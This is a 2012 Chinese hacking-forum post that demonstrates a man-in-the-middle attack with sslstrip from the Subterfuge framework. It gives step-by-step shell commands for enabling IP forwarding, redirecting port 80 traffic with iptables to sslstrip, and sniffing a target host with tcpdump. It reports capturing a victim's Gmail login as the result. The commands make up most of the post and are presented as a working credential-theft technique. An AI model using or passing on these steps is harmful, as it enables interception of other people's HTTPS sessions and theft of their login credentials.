切换风格

Wizard Sky California Sunset glow Black Cloud Beige Dragon Lavender NewYear City Snow Flowers London
收藏本站XSS平台字符串转换jsfuck
36 : 中间人攻击subterfuge分析 – sslstrip[复制链接]
发表于 2012-8-9 23:36:34 | 显示全部楼层 |!read_mode!
大家晓得HTTPS协议是不能被嗅探的,为什么subterfuge能?因为他调用了sslstrip
sslstrip是08年黑帽子大会提出的工具 突破SSL嗅探
  1. root@Dis9Team:~#cd /usr/share/subterfuge
  2. root@Dis9Team:/usr/share/subterfuge# ls
  3. arpmitm.py   db            lock.ico   settings.py   subterfuge.conf
  4. arpmitm.txt  definitions   main       settings.pyc  templates
  5. base_db      exploits      manage.py  setup.py      uninstall.py
  6. Block        httpall.log   mitm.py    sslstrip      urls.py
  7. cease        __init__.py   modules    sslstrip.log  urls.pyc
  8. COPYING      __init__.pyc  rearp.py   sslstrip.py   utilities
  9. root@Dis9Team:/usr/share/subterfuge# chmod +x sslstrip.py
  10. root@Dis9Team:/usr/share/subterfuge# ./sslstrip.py -h

  11. sslstrip 0.9 by Moxie Marlinspike
  12. Usage: sslstrip

  13. Options:
  14. -w , --write= Specify file to log to (optional).
  15. -p , --post                       Log only SSL POSTs. (default)
  16. -s , --ssl                        Log all SSL traffic to and from server.
  17. -a , --all                        Log all SSL and HTTP traffic to and from server.
  18. -l , --listen=        Port to listen on (default 10000).
  19. -f , --favicon                    Substitute a lock favicon on secure requests.
  20. -k , --killsessions               Kill sessions in progress.
  21. -h                                Print this help message.

  22. root@Dis9Team:/usr/share/subterfuge#
复制代码
进行一下测试:
开启端口转发
  1. root@Dis9Team:/usr/share/subterfuge# echo "1" > /proc/sys/net/ipv4/ip_forward
复制代码
防火墙的数据转发:
  1. root@Dis9Team:/usr/share/subterfuge# iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 1111
复制代码
OK 监听端口:
  1. root@Dis9Team:/usr/share/subterfuge# ./sslstrip.py -l 1111

  2. sslstrip 0.9 by Moxie Marlinspike running...
复制代码
然后利通嗅探工具嗅探:
  1. root@Dis9Team:/usr/share/subterfuge# tcpdump -A -i eth0 tcp and src 5.5.5.130 and port 80
复制代码
目标机子打开GMAIL登录 成功抓取到数据




附件: 你需要登录才可以下载或查看附件。没有帐号?加入Team
操千曲而后晓声,观千剑而后识器。

代码区

GMT+8, 2019-12-8 10:56

Powered by Discuz! X2

© 2001-2018 Comsenz Inc.

回顶部